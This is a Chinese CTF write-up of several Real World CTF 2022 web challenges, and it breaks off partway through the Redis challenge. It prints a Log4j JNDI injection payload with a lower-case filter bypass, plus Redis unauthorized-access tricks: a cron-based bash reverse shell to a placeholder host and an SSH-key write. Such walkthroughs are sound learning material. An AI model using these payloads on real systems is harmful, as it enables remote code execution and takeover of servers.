Real World CTF 2022（体验赛）部分WP

文章目录

Real World CTF 2022（体验赛）
Digital Souvenir
log4flag
Be-a-Database-Hacker
the Secrets of Memory
baby flaglab
Flag Console
Ghost Shiro

Real World CTF 2022（体验赛）

周末打了一下Real World CTF体验赛，据说难度比正赛降简单很多，比赛时间连续24小时，赛题类型涵盖Web/Pwn/Crypto/Reverse/Blockchain/Virtual Machine/Browser/IoT/Kernel 等等。
但是本次比赛解题方式和一般CTF不太一样，基本上都是通过CVE漏洞GETshell，与实战更为贴近。
本次比赛做的题都是Web题，简单记录一下，加深学习。如有问题请各位大佬指教。
本次比赛环境需要先访问指定端口，进行PoW（工作量证明），服务端给出Hash值前几位，需要在一定时间内提交满足条件的明文。比赛方给了参考的PoW脚本，参数跟上指定端口跑一下就行，成功之后会给你一个新的端口，访问这个端口即可进入比赛题目。注意的是每次生成心得环境存活时间600s，经常做着做着环境就挂了。。。重新跑一下就可以了。

Digital Souvenir

签到题，「解出赛题的战队」和「直播间参与互动的观众」，可以领取Real World CTF赛事定制的数字纪念品，去数字纪念品相关介绍页面，找到flag提交即可。

log4flag

看到题目名称就猜想到应该是log4j的RCE漏洞，打开题目是一个登录框：

试着构造一下exp：
${jndi:ldap://xx.xx.xx.xx:xx/}
发现返回参数错误，以admin/admin登录，返回登录失败，猜想可能过滤了关键字符，经过多次尝试发现过滤的是jndi和ldap关键字。
或者下载题目附件，通过反编译查看代码，也可得知过滤器的过滤逻辑：

那么就需要进行过滤规则的绕过，采用lower case即可绕过：
${${lower:j}ndi:${lower:l}dap://xx.xx.xx.xx/}
vps起ldap和http服务：

即可拿到flag：

Be-a-Database-Hacker

这道题查看dockerfile文件，可以得知以下几点：

本题环境是一个redis服务，且版本号位4.0.14
flag文件存放在/tmp/flag.txt
redis服务是以redis用户启动的，即非root用户

FROM redis:4.0.14
COPY flag.txt /tmp/flag.txt
RUN chown redis:redis /tmp/flag.txt

通过redis-client可以直接成功连接，存在redis的未授权访问，但没有其他可用的信息。
redis的未授权访问漏洞，常见利用方式有以下几种，这里总结一下：

1. 写计划任务

set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/xx.xx.xx.xx/xxxx 0>&1\n\n"
config set dir "/var/spool/cron"
config set dbfilename root
save

但是更改本地存放目录dir时失败，因为redis服务是以非root用户启动的，权限不够。
2. 写ssh公钥

config set dir /root/.ssh
config set dbfilename authorized_keys

同样更改本地存放目录失败，权限不够。

3. 写webshell
就没有web服务，上哪写webshell